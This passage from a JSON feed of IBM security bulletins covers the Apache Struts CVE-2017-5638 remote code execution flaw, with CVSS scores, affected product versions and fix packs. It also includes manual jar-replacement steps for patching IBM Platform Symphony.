"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T01:35:33", "type": "ibm", "title": "Security Bulletin: Apache Struts v2 Jakarta Multipart parser code execution affects IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T01:35:33", "id": "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "href": "https://www.ibm.com/support/pages/node/630909", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:52:33", "description": "## Summary\n\nIBM Sterling Order Management use Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Selling and Fulfillment Foundation 9.4.0 \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**| **_Security Fix Pack*_**| _Remediation/First Fix_ \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.5.0| **_9.5.0-SFP2_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.4.0| **_9.4.0-SFP3_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0-SFP5_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T20:09:19", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management is affected by a vulnerability (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-16T20:09:19", "id": "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "href": "https://www.ibm.com/support/pages/node/558281", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:34", "description": "## Summary\n\nIBM OpenPages GRC Platform Web Applications are not vulnerable to the Apache Struts 2 vulnerability CVE-2017-5638 \n\n## Vulnerability Details\n\nIBM OpenPages GRC Platform Web Applications are NOT vulnerable to the Apache Struts 2 vulnerability (CVE-2017-5638). \nPlease refer to [_https://cwiki.apache.org/confluence/display/WW/S2-045_](<https://cwiki.apache.org/confluence/display/WW/S2-045>) for more information on CVE-2017-5638.\n\n## Affected Products and Versions\n\nIBM OpenPages versions 7.0 through 7.3\n\n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:49:16", "type": "ibm", "title": "Security Bulletin: IBM OpenPages GRC Platform Web Applications are not vulnerable to (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-15T22:49:16", "id": "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5", "href": "https://www.ibm.com/support/pages/node/294331", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:52:11", "description": "## Summary\n\nA Security vulnerability relating to remote code execution CVE-2017-5638 (S2-045) has been reported against Apache Struts 2, which IBM Platform Symphony uses as a framework for its WEBGUI service. The Struts 2 package version that is vulnerable to these issues is included in several past versions of IBM Platform Symphony Advanced Edition and Developer Edition. Struts 2.3.32 addresses this vulnerability and can be applied through the manual steps detailed in the Remediation section.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)\n\n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \n\n**CVSS Base Score:** **7.3**\n\n**CVSS Temporal Score: See **[**_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \n\n**CVSS 3.0 Environmental Score*:** **Undefined**\n\n**CVSS Vector:** **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)**\n\n## Affected Products and Versions\n\nIBM Platform Symphony **6.1.1, 7.1 Fix Pack 1**, and** 7.1.1**,** **and** **IBM Spectrum Symphony** 7.1.2** and **7.2**. All OS editions, including Linux and Windows, are affected. The remediation steps for Linux are provided in this document. For Windows, use the Linux steps as a reference and find the correct path for patching.\n\n## Remediation/Fixes\n\n1\\. For IBM Platform Symphony 6.1.1 or 7.1 Fix Pack 1, download the appropriate fix and follow the instructions in the readme file to upgrade to Struts version 2.3.32. \n\n**Product version**| **Fix ID** \n---|--- \nIBM Platform Symphony **6.1.1**| [_sym-6.1.1-build446371_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-6.1.1-build446371&includeSupersedes=0>) \nIBM Platform Symphony **7.1 Fix Pack 1**| [_sym-7.1-build446807_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.1-build446807&includeSupersedes=0>) \n2\\. For IBM Platform Symphony 7.1.1 and higher, follow the steps to update to Struts version 2.3.32 on Linux hosts: 2.1 Log on to each management host in the cluster and download the struts-2.3.32-lib.zip package from the following location: [](<http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip>)[_http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip_](<http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip>) 2.2 Stop the Platform Management Console service (WEBGUI): > egosh service stop WEBGUI 2.3 For backup purposes, move the following files, which will be replaced by new files: **\\- For IBM Platform Symphony 7.1.1:** \n> mkdir -p /tmp/guibackup/symgui \n> mkdir -p /tmp/guibackup/perfgui \n> mv $EGO_TOP/gui/3.3/lib/commons-fileupload-1.3.1.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/3.3/lib/commons-io-1.2.jar /tmp/guibackup/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-fileupload-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/org.apache.commons-io-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-lang3-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/javassist-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-json-plugin-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-spring-plugin-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/xstream-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/velocity-1.5.jar /tmp/guibackup/symgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/perfgui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfgui/ \n**\\- For IBM Spectrum Symphony 7.1.2 and 7.2:** \n> mkdir -p /tmp/guibackup/egogui \n> mkdir -p /tmp/guibackup/perfgui \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-fileupload-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-io-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-lang3-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/org.apache.commons-io-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/freemarker-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/javassist-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/ognl-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-core-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-json-plugin-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-spring-plugin-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/xwork-core-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/xstream-*.jar /tmp/guibackup/egogui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/velocity-1.5.jar /tmp/guibackup/egogui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfgui \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfgui \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/perfgui \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfgui \n> mkdir -p /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) 2.4 On each management host, unzip the struts-2.3.32-lib.zip package and copy the following files to your cluster directory: **\\- For IBM Platform Symphony 7.1.1:** \n> unzip -u struts-2.3.32-lib.zip \n> cd struts-2.3.32/lib/ \n> cp commons-fileupload-1.3.2.jar $EGO_TOP/gui/3.3/lib/ \n> cp commons-io-2.2.jar $EGO_TOP/gui/3.3/lib/ \n> cp commons-lang3-3.2.jar $EGO_TOP/gui/3.3/lib/ \n> cp commons-fileupload-1.3.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp commons-io-2.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp commons-lang3-3.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp javassist-3.11.0.GA.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp struts2-json-plugin-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp struts2-spring-plugin-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp xstream-1.4.8.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp velocity-1.6.4.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n**\\- For IBM Spectrum Symphony 7.1.2 and 7.2:** \n> unzip -u struts-2.3.32-lib.zip \n> cd struts-2.3.32/lib/ \n> cp commons-fileupload-1.3.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp commons-io-2.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp commons-lang3-3.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp javassist-3.11.0.GA.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp struts2-json-plugin-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp struts2-spring-plugin-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp xstream-1.4.8.jar $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/ \n> cp velocity-1.6.4.jar $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) 2.5 Clean up the GUI work directories on all management hosts: > rm -rf $EGO_TOP/gui/work/* \n> rm -rf $EGO_TOP/gui/workarea/* \n**NOTE: **If you changed the default configuration for the WLP_OUTPUT_DIR environment variable and the APPEND_HOSTNAME_TO_WLP_OUTPUT_DIR parameter is set to true in the $EGO_CONFDIR/wlp.conf file, you must clean up the $WLP_OUTPUT_DIR/webgui_hostname/gui/workarea/ directory. 2.6 Launch a web browser and clear your browser\u2019s cache. \n2.7 Start the WEBGUI service: > egosh service start WEBGUI\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T01:35:45", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts 2 affects IBM Platform Symphony and IBM Spectrum Symphony (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T01:35:45", "id": "02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "href": "https://www.ibm.com/support/pages/node/631039", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:54:34", "description": "## Summary\n\nAn Apache Struts vulnerability was addressed by IBM Social Media Analytics.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Social Media Analytics version 1.3\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the following interim fix: \n[IBM Social Media Analytics 1.3.0 IF19](<http://www.ibm.com/support/docview.wss?uid=swg24043514>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:50:04", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM Social Media Analytics (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-15T22:50:04", "id": "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "href": "https://www.ibm.com/support/pages/node/558271", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-02T17:38:47", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of SAN Volume Controller, Storwize family and FlashSystem V9000 products allowing arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \n \nAll products are affected when running supported releases 7.1 to 7.8. For unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of the product.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500 to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest SAN Volume Controller Code_](<http://www-01.ibm.com/support/docview.wss?rs=591&uid=ssg1S1001707>) \n[_Latest Storwize V7000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003705>) \n[_Latest Storwize V5000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004336>) \n[_Latest Storwize V3700 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004172>) \n[_Latest Storwize V3500 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004171>) \n \nFor IBM FlashSystem V9000, upgrade to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects SAN Volume Controller, Storwize family and FlashSystem V9000 products (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-03-29T01:48:02", "id": 